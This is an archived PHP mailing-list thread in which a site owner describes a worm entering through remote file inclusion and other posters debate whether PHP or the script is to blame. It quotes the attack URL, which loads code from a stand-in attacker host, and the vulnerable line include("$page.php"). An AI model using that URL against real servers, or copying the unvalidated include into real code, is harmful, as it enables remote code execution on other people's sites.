Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Stut wrote:
> Seak, Teng-Fong wrote:
>>     But after I've spent some time reading the log files, I've finally
>> found out how the hackers managed to achieve worm infiltration.
>>
>>     Actually, they're using an URL like this:
>> http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
>>
>>
>>     And the some-worm-file.txt file contains some PHP code, while my
>> index.php contains this instruction:
>> include("$page.php");
>>
>>     This is enough to make infiltration possible!  IMO, this instruction
>> is supposed to be used like this, isn't it?  So this is obviously a PHP
>> security loophole and I don't see how the "poorly written scripts" can
>> help anything unless a totally rewrite!  And there's no "poor server
>> security" that I can see.
>
> You mean to say that you're not validating what you're getting from
> the user? Frankly you deserve everything you get.
    No, I don't deserve anything because, as I've written in the
original post (but I suppose you didn't notice), the website is
outsourced and made by a 3rd company.  I had already spent a lot of time
to learn and understand PHP, which normally isn't a part of my job.  So,
I had already done more than I should.
> This is *not* a "security loophole", it *is* a poorly written script.
    Well, when something doesn't produce the expected effect/result, or
produce a side-effect, it's considered as a bug.  If that's not a bug,
why would the behaviour be changed from PHP4 to PHP5 then?
>>     I've installed PHP5 and the problem seems fixed.  However, PHP
>> writes out where the problem occurs!  Indeed, the hacker could read a
>> line like this:
>> Warning: include() [function.include]: URL file-access is disabled in
>> the server configuration in
>> C:\Inetpub\wwwroot\index.php on line X
>>
>>     I don't want them (the hackers) to be able to read this either.
>> That gives too much information about my server's file system.  How can
>> I stop that?
>
> Read the manual, specifically the error_reporting part. You can turn
> the display of these messages off.
    I had.  Well, I had tried to do so, spending time out of my tightly
scheduled job planning.
>>     By the way, I know there're still a lot of servers out there still
>> using PHP4.  Is this vulnerability a known bug?  At least, I'm not aware
>> of that before!
>
> It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+)
> introduces the ability to turn off the ability to prevent this issue,
> but it's still badly written code. Stop blaming the tool, start
> blaming the mirror image and start learning how to code defensively.
>
> -Stut
>



----------
* Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! www.zoner.com/zps
  You can download your free version.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux